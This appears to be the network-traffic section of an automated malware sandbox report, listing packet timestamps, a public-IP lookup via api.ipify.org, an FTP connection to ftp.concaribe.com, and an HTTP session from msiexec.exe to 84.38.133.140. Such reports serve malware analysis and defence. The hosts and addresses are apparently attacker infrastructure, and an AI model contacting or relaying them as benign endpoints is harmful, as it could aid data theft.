Sep 27, 2024 18:34:24.755667925 CEST	80	49714	84.38.133.140	192.168.2.5
Sep 27, 2024 18:34:24.755669117 CEST	49714	80	192.168.2.5	84.38.133.140
Sep 27, 2024 18:34:24.755707979 CEST	49714	80	192.168.2.5	84.38.133.140
Sep 27, 2024 18:34:24.755719900 CEST	80	49714	84.38.133.140	192.168.2.5
Sep 27, 2024 18:34:24.755754948 CEST	80	49714	84.38.133.140	192.168.2.5
Sep 27, 2024 18:34:24.755764961 CEST	49714	80	192.168.2.5	84.38.133.140
Sep 27, 2024 18:34:24.755788088 CEST	80	49714	84.38.133.140	192.168.2.5
Sep 27, 2024 18:34:24.755809069 CEST	49714	80	192.168.2.5	84.38.133.140
Sep 27, 2024 18:34:24.755821943 CEST	80	49714	84.38.133.140	192.168.2.5
Sep 27, 2024 18:34:24.755862951 CEST	49714	80	192.168.2.5	84.38.133.140
Sep 27, 2024 18:34:24.755947113 CEST	49714	80	192.168.2.5	84.38.133.140
Sep 27, 2024 18:34:24.756247044 CEST	80	49714	84.38.133.140	192.168.2.5
Sep 27, 2024 18:34:24.756300926 CEST	80	49714	84.38.133.140	192.168.2.5
Sep 27, 2024 18:34:24.756361961 CEST	80	49714	84.38.133.140	192.168.2.5
Sep 27, 2024 18:34:24.756371975 CEST	49714	80	192.168.2.5	84.38.133.140
Sep 27, 2024 18:34:24.756391048 CEST	80	49714	84.38.133.140	192.168.2.5
Sep 27, 2024 18:34:24.756402969 CEST	49714	80	192.168.2.5	84.38.133.140
Sep 27, 2024 18:34:24.756444931 CEST	49714	80	192.168.2.5	84.38.133.140
Sep 27, 2024 18:34:24.756484985 CEST	80	49714	84.38.133.140	192.168.2.5
Sep 27, 2024 18:34:24.756498098 CEST	49714	80	192.168.2.5	84.38.133.140
Sep 27, 2024 18:34:24.756546021 CEST	80	49714	84.38.133.140	192.168.2.5
Sep 27, 2024 18:34:24.756584883 CEST	49714	80	192.168.2.5	84.38.133.140
Sep 27, 2024 18:34:24.756644011 CEST	49714	80	192.168.2.5	84.38.133.140
Sep 27, 2024 18:34:24.761688948 CEST	80	49714	84.38.133.140	192.168.2.5
Sep 27, 2024 18:34:24.761717081 CEST	80	49714	84.38.133.140	192.168.2.5
Sep 27, 2024 18:34:24.761755943 CEST	49714	80	192.168.2.5	84.38.133.140
Sep 27, 2024 18:34:24.761810064 CEST	49714	80	192.168.2.5	84.38.133.140
Sep 27, 2024 18:34:24.761818886 CEST	80	49714	84.38.133.140	192.168.2.5
Sep 27, 2024 18:34:24.761854887 CEST	80	49714	84.38.133.140	192.168.2.5
Sep 27, 2024 18:34:24.761889935 CEST	80	49714	84.38.133.140	192.168.2.5
Sep 27, 2024 18:34:24.761892080 CEST	49714	80	192.168.2.5	84.38.133.140
Sep 27, 2024 18:34:24.761929989 CEST	49714	80	192.168.2.5	84.38.133.140
Sep 27, 2024 18:34:24.761948109 CEST	49714	80	192.168.2.5	84.38.133.140
Sep 27, 2024 18:34:24.761970997 CEST	80	49714	84.38.133.140	192.168.2.5
Sep 27, 2024 18:34:24.762002945 CEST	80	49714	84.38.133.140	192.168.2.5
Sep 27, 2024 18:34:24.762026072 CEST	49714	80	192.168.2.5	84.38.133.140
Sep 27, 2024 18:34:24.762052059 CEST	49714	80	192.168.2.5	84.38.133.140
Sep 27, 2024 18:34:24.762062073 CEST	80	49714	84.38.133.140	192.168.2.5
Sep 27, 2024 18:34:24.762120008 CEST	49714	80	192.168.2.5	84.38.133.140
Sep 27, 2024 18:34:24.762100935 CEST	80	49714	84.38.133.140	192.168.2.5
Sep 27, 2024 18:34:24.762182951 CEST	49714	80	192.168.2.5	84.38.133.140
Sep 27, 2024 18:34:24.762237072 CEST	80	49714	84.38.133.140	192.168.2.5
Sep 27, 2024 18:34:24.762299061 CEST	49714	80	192.168.2.5	84.38.133.140
Sep 27, 2024 18:34:24.762716055 CEST	80	49714	84.38.133.140	192.168.2.5
Sep 27, 2024 18:34:24.762767076 CEST	80	49714	84.38.133.140	192.168.2.5
Sep 27, 2024 18:34:24.762778997 CEST	49714	80	192.168.2.5	84.38.133.140
Sep 27, 2024 18:34:24.762835026 CEST	49714	80	192.168.2.5	84.38.133.140
Sep 27, 2024 18:34:24.762881994 CEST	80	49714	84.38.133.140	192.168.2.5
Sep 27, 2024 18:34:24.762931108 CEST	80	49714	84.38.133.140	192.168.2.5
Sep 27, 2024 18:34:24.762963057 CEST	80	49714	84.38.133.140	192.168.2.5
Sep 27, 2024 18:34:24.763046980 CEST	80	49714	84.38.133.140	192.168.2.5
Sep 27, 2024 18:34:24.763078928 CEST	80	49714	84.38.133.140	192.168.2.5
Sep 27, 2024 18:34:24.763088942 CEST	49714	80	192.168.2.5	84.38.133.140
Sep 27, 2024 18:34:24.763112068 CEST	80	49714	84.38.133.140	192.168.2.5
Sep 27, 2024 18:34:24.763144970 CEST	80	49714	84.38.133.140	192.168.2.5
Sep 27, 2024 18:34:24.763154984 CEST	49714	80	192.168.2.5	84.38.133.140
Sep 27, 2024 18:34:24.763154984 CEST	49714	80	192.168.2.5	84.38.133.140
Sep 27, 2024 18:34:24.763180017 CEST	80	49714	84.38.133.140	192.168.2.5
Sep 27, 2024 18:34:24.763197899 CEST	49714	80	192.168.2.5	84.38.133.140
Sep 27, 2024 18:34:24.763219118 CEST	49714	80	192.168.2.5	84.38.133.140
Sep 27, 2024 18:34:24.763259888 CEST	49714	80	192.168.2.5	84.38.133.140
Sep 27, 2024 18:34:24.763897896 CEST	80	49714	84.38.133.140	192.168.2.5
Sep 27, 2024 18:34:24.763955116 CEST	49714	80	192.168.2.5	84.38.133.140
Sep 27, 2024 18:34:24.767100096 CEST	80	49714	84.38.133.140	192.168.2.5
Sep 27, 2024 18:34:24.767149925 CEST	80	49714	84.38.133.140	192.168.2.5
Sep 27, 2024 18:34:24.767168045 CEST	49714	80	192.168.2.5	84.38.133.140
Sep 27, 2024 18:34:24.767199039 CEST	80	49714	84.38.133.140	192.168.2.5
Sep 27, 2024 18:34:24.767208099 CEST	49714	80	192.168.2.5	84.38.133.140
Sep 27, 2024 18:34:24.767235041 CEST	80	49714	84.38.133.140	192.168.2.5
Sep 27, 2024 18:34:24.767254114 CEST	49714	80	192.168.2.5	84.38.133.140
Sep 27, 2024 18:34:24.767271996 CEST	80	49714	84.38.133.140	192.168.2.5
Sep 27, 2024 18:34:24.767281055 CEST	49714	80	192.168.2.5	84.38.133.140
Sep 27, 2024 18:34:24.767306089 CEST	80	49714	84.38.133.140	192.168.2.5
Sep 27, 2024 18:34:24.767332077 CEST	49714	80	192.168.2.5	84.38.133.140
Sep 27, 2024 18:34:24.767369986 CEST	49714	80	192.168.2.5	84.38.133.140
Sep 27, 2024 18:34:24.767462015 CEST	80	49714	84.38.133.140	192.168.2.5
Sep 27, 2024 18:34:24.767513990 CEST	80	49714	84.38.133.140	192.168.2.5
Sep 27, 2024 18:34:24.767519951 CEST	49714	80	192.168.2.5	84.38.133.140
Sep 27, 2024 18:34:24.767546892 CEST	80	49714	84.38.133.140	192.168.2.5
Sep 27, 2024 18:34:24.767575979 CEST	49714	80	192.168.2.5	84.38.133.140
Sep 27, 2024 18:34:24.767600060 CEST	80	49714	84.38.133.140	192.168.2.5
Sep 27, 2024 18:34:24.767601967 CEST	49714	80	192.168.2.5	84.38.133.140
Sep 27, 2024 18:34:24.767635107 CEST	80	49714	84.38.133.140	192.168.2.5
Sep 27, 2024 18:34:24.767657042 CEST	49714	80	192.168.2.5	84.38.133.140
Sep 27, 2024 18:34:24.767668962 CEST	80	49714	84.38.133.140	192.168.2.5
Sep 27, 2024 18:34:24.767694950 CEST	49714	80	192.168.2.5	84.38.133.140
Sep 27, 2024 18:34:24.767702103 CEST	80	49714	84.38.133.140	192.168.2.5
Sep 27, 2024 18:34:24.767720938 CEST	49714	80	192.168.2.5	84.38.133.140
Sep 27, 2024 18:34:24.767736912 CEST	80	49714	84.38.133.140	192.168.2.5
Sep 27, 2024 18:34:24.767759085 CEST	49714	80	192.168.2.5	84.38.133.140
Sep 27, 2024 18:34:24.767793894 CEST	49714	80	192.168.2.5	84.38.133.140
Sep 27, 2024 18:34:24.768358946 CEST	80	49714	84.38.133.140	192.168.2.5
Sep 27, 2024 18:34:24.768409014 CEST	80	49714	84.38.133.140	192.168.2.5
Sep 27, 2024 18:34:24.768428087 CEST	49714	80	192.168.2.5	84.38.133.140
Sep 27, 2024 18:34:24.768464088 CEST	49714	80	192.168.2.5	84.38.133.140
Sep 27, 2024 18:34:24.773534060 CEST	80	49714	84.38.133.140	192.168.2.5
Sep 27, 2024 18:34:24.773600101 CEST	80	49714	84.38.133.140	192.168.2.5
Sep 27, 2024 18:34:24.773601055 CEST	49714	80	192.168.2.5	84.38.133.140
Sep 27, 2024 18:34:24.773628950 CEST	80	49714	84.38.133.140	192.168.2.5
Sep 27, 2024 18:34:24.773659945 CEST	49714	80	192.168.2.5	84.38.133.140
Sep 27, 2024 18:34:24.773680925 CEST	80	49714	84.38.133.140	192.168.2.5
Sep 27, 2024 18:34:24.773695946 CEST	49714	80	192.168.2.5	84.38.133.140
Sep 27, 2024 18:34:24.773714066 CEST	80	49714	84.38.133.140	192.168.2.5
Sep 27, 2024 18:34:24.773736954 CEST	49714	80	192.168.2.5	84.38.133.140
Sep 27, 2024 18:34:24.773746967 CEST	80	49714	84.38.133.140	192.168.2.5
Sep 27, 2024 18:34:24.773781061 CEST	49714	80	192.168.2.5	84.38.133.140
Sep 27, 2024 18:34:24.773807049 CEST	49714	80	192.168.2.5	84.38.133.140
Sep 27, 2024 18:34:24.773917913 CEST	80	49714	84.38.133.140	192.168.2.5
Sep 27, 2024 18:34:24.773968935 CEST	49714	80	192.168.2.5	84.38.133.140
Sep 27, 2024 18:34:24.774032116 CEST	80	49714	84.38.133.140	192.168.2.5
Sep 27, 2024 18:34:24.774060965 CEST	80	49714	84.38.133.140	192.168.2.5
Sep 27, 2024 18:34:24.774086952 CEST	49714	80	192.168.2.5	84.38.133.140
Sep 27, 2024 18:34:24.774096012 CEST	80	49714	84.38.133.140	192.168.2.5
Sep 27, 2024 18:34:24.774112940 CEST	49714	80	192.168.2.5	84.38.133.140
Sep 27, 2024 18:34:24.774128914 CEST	80	49714	84.38.133.140	192.168.2.5
Sep 27, 2024 18:34:24.774166107 CEST	49714	80	192.168.2.5	84.38.133.140
Sep 27, 2024 18:34:24.774188042 CEST	49714	80	192.168.2.5	84.38.133.140
Sep 27, 2024 18:34:24.774194956 CEST	80	49714	84.38.133.140	192.168.2.5
Sep 27, 2024 18:34:24.774247885 CEST	80	49714	84.38.133.140	192.168.2.5
Sep 27, 2024 18:34:24.774274111 CEST	49714	80	192.168.2.5	84.38.133.140
Sep 27, 2024 18:34:24.774283886 CEST	80	49714	84.38.133.140	192.168.2.5
Sep 27, 2024 18:34:24.774319887 CEST	49714	80	192.168.2.5	84.38.133.140
Sep 27, 2024 18:34:24.774349928 CEST	49714	80	192.168.2.5	84.38.133.140
Sep 27, 2024 18:34:24.774405003 CEST	80	49714	84.38.133.140	192.168.2.5
Sep 27, 2024 18:34:24.774436951 CEST	80	49714	84.38.133.140	192.168.2.5
Sep 27, 2024 18:34:24.774468899 CEST	80	49714	84.38.133.140	192.168.2.5
Sep 27, 2024 18:34:24.774468899 CEST	49714	80	192.168.2.5	84.38.133.140
Sep 27, 2024 18:34:24.774502039 CEST	80	49714	84.38.133.140	192.168.2.5
Sep 27, 2024 18:34:24.774504900 CEST	49714	80	192.168.2.5	84.38.133.140
Sep 27, 2024 18:34:24.774524927 CEST	49714	80	192.168.2.5	84.38.133.140
Sep 27, 2024 18:34:24.774535894 CEST	80	49714	84.38.133.140	192.168.2.5
Sep 27, 2024 18:34:24.774554968 CEST	49714	80	192.168.2.5	84.38.133.140
Sep 27, 2024 18:34:24.774591923 CEST	49714	80	192.168.2.5	84.38.133.140
Sep 27, 2024 18:34:24.774663925 CEST	80	49714	84.38.133.140	192.168.2.5
Sep 27, 2024 18:34:24.774727106 CEST	49714	80	192.168.2.5	84.38.133.140
Sep 27, 2024 18:34:24.774754047 CEST	80	49714	84.38.133.140	192.168.2.5
Sep 27, 2024 18:34:24.774802923 CEST	80	49714	84.38.133.140	192.168.2.5
Sep 27, 2024 18:34:24.774815083 CEST	49714	80	192.168.2.5	84.38.133.140
Sep 27, 2024 18:34:24.774837971 CEST	80	49714	84.38.133.140	192.168.2.5
Sep 27, 2024 18:34:24.774858952 CEST	49714	80	192.168.2.5	84.38.133.140
Sep 27, 2024 18:34:24.774871111 CEST	80	49714	84.38.133.140	192.168.2.5
Sep 27, 2024 18:34:24.774907112 CEST	49714	80	192.168.2.5	84.38.133.140
Sep 27, 2024 18:34:24.774931908 CEST	49714	80	192.168.2.5	84.38.133.140
Sep 27, 2024 18:34:24.842348099 CEST	80	49714	84.38.133.140	192.168.2.5
Sep 27, 2024 18:34:24.842384100 CEST	80	49714	84.38.133.140	192.168.2.5
Sep 27, 2024 18:34:24.842432976 CEST	80	49714	84.38.133.140	192.168.2.5
Sep 27, 2024 18:34:24.842483997 CEST	80	49714	84.38.133.140	192.168.2.5
Sep 27, 2024 18:34:24.842489958 CEST	49714	80	192.168.2.5	84.38.133.140
Sep 27, 2024 18:34:24.842519045 CEST	80	49714	84.38.133.140	192.168.2.5
Sep 27, 2024 18:34:24.842554092 CEST	80	49714	84.38.133.140	192.168.2.5
Sep 27, 2024 18:34:24.842565060 CEST	49714	80	192.168.2.5	84.38.133.140
Sep 27, 2024 18:34:24.842590094 CEST	49714	80	192.168.2.5	84.38.133.140
Sep 27, 2024 18:34:24.842593908 CEST	80	49714	84.38.133.140	192.168.2.5
Sep 27, 2024 18:34:24.842633963 CEST	80	49714	84.38.133.140	192.168.2.5
Sep 27, 2024 18:34:24.842652082 CEST	49714	80	192.168.2.5	84.38.133.140
Sep 27, 2024 18:34:24.842699051 CEST	49714	80	192.168.2.5	84.38.133.140
Sep 27, 2024 18:34:24.842730045 CEST	80	49714	84.38.133.140	192.168.2.5
Sep 27, 2024 18:34:24.842784882 CEST	49714	80	192.168.2.5	84.38.133.140
Sep 27, 2024 18:34:24.842808962 CEST	80	49714	84.38.133.140	192.168.2.5
Sep 27, 2024 18:34:24.842843056 CEST	80	49714	84.38.133.140	192.168.2.5
Sep 27, 2024 18:34:24.842866898 CEST	49714	80	192.168.2.5	84.38.133.140
Sep 27, 2024 18:34:24.842894077 CEST	80	49714	84.38.133.140	192.168.2.5
Sep 27, 2024 18:34:24.842897892 CEST	49714	80	192.168.2.5	84.38.133.140
Sep 27, 2024 18:34:24.842926979 CEST	80	49714	84.38.133.140	192.168.2.5
Sep 27, 2024 18:34:24.842952967 CEST	49714	80	192.168.2.5	84.38.133.140
Sep 27, 2024 18:34:24.842961073 CEST	80	49714	84.38.133.140	192.168.2.5
Sep 27, 2024 18:34:24.842981100 CEST	49714	80	192.168.2.5	84.38.133.140
Sep 27, 2024 18:34:24.842997074 CEST	80	49714	84.38.133.140	192.168.2.5
Sep 27, 2024 18:34:24.843020916 CEST	49714	80	192.168.2.5	84.38.133.140
Sep 27, 2024 18:34:24.843046904 CEST	80	49714	84.38.133.140	192.168.2.5
Sep 27, 2024 18:34:24.843050003 CEST	49714	80	192.168.2.5	84.38.133.140
Sep 27, 2024 18:34:24.843080044 CEST	80	49714	84.38.133.140	192.168.2.5
Sep 27, 2024 18:34:24.843107939 CEST	49714	80	192.168.2.5	84.38.133.140
Sep 27, 2024 18:34:24.843112946 CEST	80	49714	84.38.133.140	192.168.2.5
Sep 27, 2024 18:34:24.843141079 CEST	49714	80	192.168.2.5	84.38.133.140
Sep 27, 2024 18:34:24.843163967 CEST	80	49714	84.38.133.140	192.168.2.5
Sep 27, 2024 18:34:24.843199015 CEST	80	49714	84.38.133.140	192.168.2.5
Sep 27, 2024 18:34:24.843202114 CEST	49714	80	192.168.2.5	84.38.133.140
Sep 27, 2024 18:34:24.843224049 CEST	49714	80	192.168.2.5	84.38.133.140
Sep 27, 2024 18:34:24.843256950 CEST	49714	80	192.168.2.5	84.38.133.140
Sep 27, 2024 18:34:24.848515034 CEST	80	49714	84.38.133.140	192.168.2.5
Sep 27, 2024 18:34:24.848568916 CEST	80	49714	84.38.133.140	192.168.2.5
Sep 27, 2024 18:34:24.848597050 CEST	80	49714	84.38.133.140	192.168.2.5
Sep 27, 2024 18:34:24.848644972 CEST	80	49714	84.38.133.140	192.168.2.5
Sep 27, 2024 18:34:24.848650932 CEST	49714	80	192.168.2.5	84.38.133.140
Sep 27, 2024 18:34:24.848678112 CEST	80	49714	84.38.133.140	192.168.2.5
Sep 27, 2024 18:34:24.848710060 CEST	49714	80	192.168.2.5	84.38.133.140
Sep 27, 2024 18:34:24.848712921 CEST	80	49714	84.38.133.140	192.168.2.5
Sep 27, 2024 18:34:24.848754883 CEST	49714	80	192.168.2.5	84.38.133.140
Sep 27, 2024 18:34:24.848788023 CEST	49714	80	192.168.2.5	84.38.133.140
Sep 27, 2024 18:34:24.848875999 CEST	80	49714	84.38.133.140	192.168.2.5
Sep 27, 2024 18:34:24.848908901 CEST	80	49714	84.38.133.140	192.168.2.5
Sep 27, 2024 18:34:24.848942041 CEST	80	49714	84.38.133.140	192.168.2.5
Sep 27, 2024 18:34:24.848957062 CEST	49714	80	192.168.2.5	84.38.133.140
Sep 27, 2024 18:34:24.848957062 CEST	49714	80	192.168.2.5	84.38.133.140
Sep 27, 2024 18:34:24.848975897 CEST	80	49714	84.38.133.140	192.168.2.5
Sep 27, 2024 18:34:24.848990917 CEST	49714	80	192.168.2.5	84.38.133.140
Sep 27, 2024 18:34:24.849023104 CEST	49714	80	192.168.2.5	84.38.133.140
Sep 27, 2024 18:34:24.849158049 CEST	80	49714	84.38.133.140	192.168.2.5
Sep 27, 2024 18:34:24.849189997 CEST	80	49714	84.38.133.140	192.168.2.5
Sep 27, 2024 18:34:24.849220037 CEST	49714	80	192.168.2.5	84.38.133.140
Sep 27, 2024 18:34:24.849240065 CEST	80	49714	84.38.133.140	192.168.2.5
Sep 27, 2024 18:34:24.849241018 CEST	49714	80	192.168.2.5	84.38.133.140
Sep 27, 2024 18:34:24.849273920 CEST	80	49714	84.38.133.140	192.168.2.5
Sep 27, 2024 18:34:24.849299908 CEST	49714	80	192.168.2.5	84.38.133.140
Sep 27, 2024 18:34:24.849308014 CEST	80	49714	84.38.133.140	192.168.2.5
Sep 27, 2024 18:34:24.849329948 CEST	49714	80	192.168.2.5	84.38.133.140
Sep 27, 2024 18:34:24.849361897 CEST	49714	80	192.168.2.5	84.38.133.140
Sep 27, 2024 18:34:24.849493980 CEST	80	49714	84.38.133.140	192.168.2.5
Sep 27, 2024 18:34:24.849525928 CEST	80	49714	84.38.133.140	192.168.2.5
Sep 27, 2024 18:34:24.849554062 CEST	49714	80	192.168.2.5	84.38.133.140
Sep 27, 2024 18:34:24.849560976 CEST	80	49714	84.38.133.140	192.168.2.5
Sep 27, 2024 18:34:24.849574089 CEST	49714	80	192.168.2.5	84.38.133.140
Sep 27, 2024 18:34:24.849613905 CEST	80	49714	84.38.133.140	192.168.2.5
Sep 27, 2024 18:34:24.849625111 CEST	49714	80	192.168.2.5	84.38.133.140
Sep 27, 2024 18:34:24.849647999 CEST	80	49714	84.38.133.140	192.168.2.5
Sep 27, 2024 18:34:24.849668026 CEST	49714	80	192.168.2.5	84.38.133.140
Sep 27, 2024 18:34:24.849680901 CEST	80	49714	84.38.133.140	192.168.2.5
Sep 27, 2024 18:34:24.849700928 CEST	49714	80	192.168.2.5	84.38.133.140
Sep 27, 2024 18:34:24.849715948 CEST	80	49714	84.38.133.140	192.168.2.5
Sep 27, 2024 18:34:24.849730968 CEST	49714	80	192.168.2.5	84.38.133.140
Sep 27, 2024 18:34:24.849754095 CEST	80	49714	84.38.133.140	192.168.2.5
Sep 27, 2024 18:34:24.849766970 CEST	49714	80	192.168.2.5	84.38.133.140
Sep 27, 2024 18:34:24.849787951 CEST	80	49714	84.38.133.140	192.168.2.5
Sep 27, 2024 18:34:24.849809885 CEST	49714	80	192.168.2.5	84.38.133.140
Sep 27, 2024 18:34:24.849821091 CEST	80	49714	84.38.133.140	192.168.2.5
Sep 27, 2024 18:34:24.849842072 CEST	49714	80	192.168.2.5	84.38.133.140
Sep 27, 2024 18:34:24.849857092 CEST	80	49714	84.38.133.140	192.168.2.5
Sep 27, 2024 18:34:24.849877119 CEST	49714	80	192.168.2.5	84.38.133.140
Sep 27, 2024 18:34:24.849924088 CEST	49714	80	192.168.2.5	84.38.133.140
Sep 27, 2024 18:34:24.850358963 CEST	80	49714	84.38.133.140	192.168.2.5
Sep 27, 2024 18:34:24.850390911 CEST	80	49714	84.38.133.140	192.168.2.5
Sep 27, 2024 18:34:24.850421906 CEST	49714	80	192.168.2.5	84.38.133.140
Sep 27, 2024 18:34:24.850425005 CEST	80	49714	84.38.133.140	192.168.2.5
Sep 27, 2024 18:34:24.850445032 CEST	49714	80	192.168.2.5	84.38.133.140
Sep 27, 2024 18:34:24.850474119 CEST	80	49714	84.38.133.140	192.168.2.5
Sep 27, 2024 18:34:24.850477934 CEST	49714	80	192.168.2.5	84.38.133.140
Sep 27, 2024 18:34:24.850507975 CEST	80	49714	84.38.133.140	192.168.2.5
Sep 27, 2024 18:34:24.850528002 CEST	49714	80	192.168.2.5	84.38.133.140
Sep 27, 2024 18:34:24.850539923 CEST	80	49714	84.38.133.140	192.168.2.5
Sep 27, 2024 18:34:24.850557089 CEST	49714	80	192.168.2.5	84.38.133.140
Sep 27, 2024 18:34:24.850574017 CEST	80	49714	84.38.133.140	192.168.2.5
Sep 27, 2024 18:34:24.850593090 CEST	49714	80	192.168.2.5	84.38.133.140
Sep 27, 2024 18:34:24.850626945 CEST	80	49714	84.38.133.140	192.168.2.5
Sep 27, 2024 18:34:24.850636959 CEST	49714	80	192.168.2.5	84.38.133.140
Sep 27, 2024 18:34:24.850660086 CEST	80	49714	84.38.133.140	192.168.2.5
Sep 27, 2024 18:34:24.850689888 CEST	49714	80	192.168.2.5	84.38.133.140
Sep 27, 2024 18:34:24.850692987 CEST	80	49714	84.38.133.140	192.168.2.5
Sep 27, 2024 18:34:24.850708008 CEST	49714	80	192.168.2.5	84.38.133.140
Sep 27, 2024 18:34:24.850728035 CEST	80	49714	84.38.133.140	192.168.2.5
Sep 27, 2024 18:34:24.850749016 CEST	49714	80	192.168.2.5	84.38.133.140
Sep 27, 2024 18:34:24.850760937 CEST	80	49714	84.38.133.140	192.168.2.5
Sep 27, 2024 18:34:24.850783110 CEST	49714	80	192.168.2.5	84.38.133.140
Sep 27, 2024 18:34:24.850816011 CEST	49714	80	192.168.2.5	84.38.133.140
Sep 27, 2024 18:34:24.851295948 CEST	80	49714	84.38.133.140	192.168.2.5
Sep 27, 2024 18:34:24.851345062 CEST	80	49714	84.38.133.140	192.168.2.5
Sep 27, 2024 18:34:24.851356030 CEST	49714	80	192.168.2.5	84.38.133.140
Sep 27, 2024 18:34:24.851380110 CEST	80	49714	84.38.133.140	192.168.2.5
Sep 27, 2024 18:34:24.851428986 CEST	80	49714	84.38.133.140	192.168.2.5
Sep 27, 2024 18:34:24.851432085 CEST	49714	80	192.168.2.5	84.38.133.140
Sep 27, 2024 18:34:24.851432085 CEST	49714	80	192.168.2.5	84.38.133.140
Sep 27, 2024 18:34:24.851464033 CEST	80	49714	84.38.133.140	192.168.2.5
Sep 27, 2024 18:34:24.851490021 CEST	49714	80	192.168.2.5	84.38.133.140
Sep 27, 2024 18:34:24.851511955 CEST	49714	80	192.168.2.5	84.38.133.140
Sep 27, 2024 18:34:24.853981972 CEST	80	49714	84.38.133.140	192.168.2.5
Sep 27, 2024 18:34:24.854015112 CEST	80	49714	84.38.133.140	192.168.2.5
Sep 27, 2024 18:34:24.854032993 CEST	80	49714	84.38.133.140	192.168.2.5
Sep 27, 2024 18:34:24.854048967 CEST	80	49714	84.38.133.140	192.168.2.5
Sep 27, 2024 18:34:24.854106903 CEST	80	49714	84.38.133.140	192.168.2.5
Sep 27, 2024 18:34:24.854144096 CEST	80	49714	84.38.133.140	192.168.2.5
Sep 27, 2024 18:34:24.854181051 CEST	80	49714	84.38.133.140	192.168.2.5
Sep 27, 2024 18:34:24.854212999 CEST	49714	80	192.168.2.5	84.38.133.140
Sep 27, 2024 18:34:24.854213953 CEST	80	49714	84.38.133.140	192.168.2.5
Sep 27, 2024 18:34:24.854247093 CEST	49714	80	192.168.2.5	84.38.133.140
Sep 27, 2024 18:34:24.854248047 CEST	80	49714	84.38.133.140	192.168.2.5
Sep 27, 2024 18:34:24.854264021 CEST	49714	80	192.168.2.5	84.38.133.140
Sep 27, 2024 18:34:24.854302883 CEST	49714	80	192.168.2.5	84.38.133.140
Sep 27, 2024 18:34:24.854458094 CEST	80	49714	84.38.133.140	192.168.2.5
Sep 27, 2024 18:34:24.854510069 CEST	80	49714	84.38.133.140	192.168.2.5
Sep 27, 2024 18:34:24.854528904 CEST	49714	80	192.168.2.5	84.38.133.140
Sep 27, 2024 18:34:24.854559898 CEST	80	49714	84.38.133.140	192.168.2.5
Sep 27, 2024 18:34:24.854568005 CEST	49714	80	192.168.2.5	84.38.133.140
Sep 27, 2024 18:34:24.854594946 CEST	80	49714	84.38.133.140	192.168.2.5
Sep 27, 2024 18:34:24.854620934 CEST	49714	80	192.168.2.5	84.38.133.140
Sep 27, 2024 18:34:24.854629040 CEST	80	49714	84.38.133.140	192.168.2.5
Sep 27, 2024 18:34:24.854644060 CEST	49714	80	192.168.2.5	84.38.133.140
Sep 27, 2024 18:34:24.854691029 CEST	49714	80	192.168.2.5	84.38.133.140
Sep 27, 2024 18:34:25.179435968 CEST	49715	443	192.168.2.5	104.26.13.205
Sep 27, 2024 18:34:25.179506063 CEST	443	49715	104.26.13.205	192.168.2.5
Sep 27, 2024 18:34:25.179580927 CEST	49715	443	192.168.2.5	104.26.13.205
Sep 27, 2024 18:34:25.190516949 CEST	49715	443	192.168.2.5	104.26.13.205
Sep 27, 2024 18:34:25.190541983 CEST	443	49715	104.26.13.205	192.168.2.5
Sep 27, 2024 18:34:25.675139904 CEST	443	49715	104.26.13.205	192.168.2.5
Sep 27, 2024 18:34:25.675216913 CEST	49715	443	192.168.2.5	104.26.13.205
Sep 27, 2024 18:34:25.679369926 CEST	49715	443	192.168.2.5	104.26.13.205
Sep 27, 2024 18:34:25.679397106 CEST	443	49715	104.26.13.205	192.168.2.5
Sep 27, 2024 18:34:25.679647923 CEST	443	49715	104.26.13.205	192.168.2.5
Sep 27, 2024 18:34:25.722544909 CEST	49715	443	192.168.2.5	104.26.13.205
Sep 27, 2024 18:34:25.763405085 CEST	443	49715	104.26.13.205	192.168.2.5
Sep 27, 2024 18:34:25.829799891 CEST	443	49715	104.26.13.205	192.168.2.5
Sep 27, 2024 18:34:25.829864979 CEST	443	49715	104.26.13.205	192.168.2.5
Sep 27, 2024 18:34:25.829925060 CEST	49715	443	192.168.2.5	104.26.13.205
Sep 27, 2024 18:34:25.833801031 CEST	49715	443	192.168.2.5	104.26.13.205
Sep 27, 2024 18:34:27.164324999 CEST	49716	21	192.168.2.5	192.185.13.234
Sep 27, 2024 18:34:27.169306993 CEST	21	49716	192.185.13.234	192.168.2.5
Sep 27, 2024 18:34:27.169388056 CEST	49716	21	192.168.2.5	192.185.13.234
Sep 27, 2024 18:34:27.172436953 CEST	49716	21	192.168.2.5	192.185.13.234
Sep 27, 2024 18:34:27.177423954 CEST	21	49716	192.185.13.234	192.168.2.5
Sep 27, 2024 18:34:27.177511930 CEST	49716	21	192.168.2.5	192.185.13.234

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Sep 27, 2024 18:34:25.165144920 CEST	57532	53	192.168.2.5	1.1.1.1
Sep 27, 2024 18:34:25.174098015 CEST	53	57532	1.1.1.1	192.168.2.5
Sep 27, 2024 18:34:26.846685886 CEST	52270	53	192.168.2.5	1.1.1.1
Sep 27, 2024 18:34:27.162977934 CEST	53	52270	1.1.1.1	192.168.2.5

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Sep 27, 2024 18:34:25.165144920 CEST	192.168.2.5	1.1.1.1	0xd1de	Standard query (0)	api.ipify.org	A (IP address)	IN (0x0001)	false
Sep 27, 2024 18:34:26.846685886 CEST	192.168.2.5	1.1.1.1	0xdfd5	Standard query (0)	ftp.concaribe.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Sep 27, 2024 18:34:25.174098015 CEST	1.1.1.1	192.168.2.5	0xd1de	No error (0)	api.ipify.org		104.26.13.205	A (IP address)	IN (0x0001)	false
Sep 27, 2024 18:34:25.174098015 CEST	1.1.1.1	192.168.2.5	0xd1de	No error (0)	api.ipify.org		172.67.74.152	A (IP address)	IN (0x0001)	false
Sep 27, 2024 18:34:25.174098015 CEST	1.1.1.1	192.168.2.5	0xd1de	No error (0)	api.ipify.org		104.26.12.205	A (IP address)	IN (0x0001)	false
Sep 27, 2024 18:34:27.162977934 CEST	1.1.1.1	192.168.2.5	0xdfd5	No error (0)	ftp.concaribe.com	concaribe.com		CNAME (Canonical name)	IN (0x0001)	false
Sep 27, 2024 18:34:27.162977934 CEST	1.1.1.1	192.168.2.5	0xdfd5	No error (0)	concaribe.com		192.185.13.234	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

api.ipify.org

84.38.133.140

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49714	84.38.133.140	80	3876	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
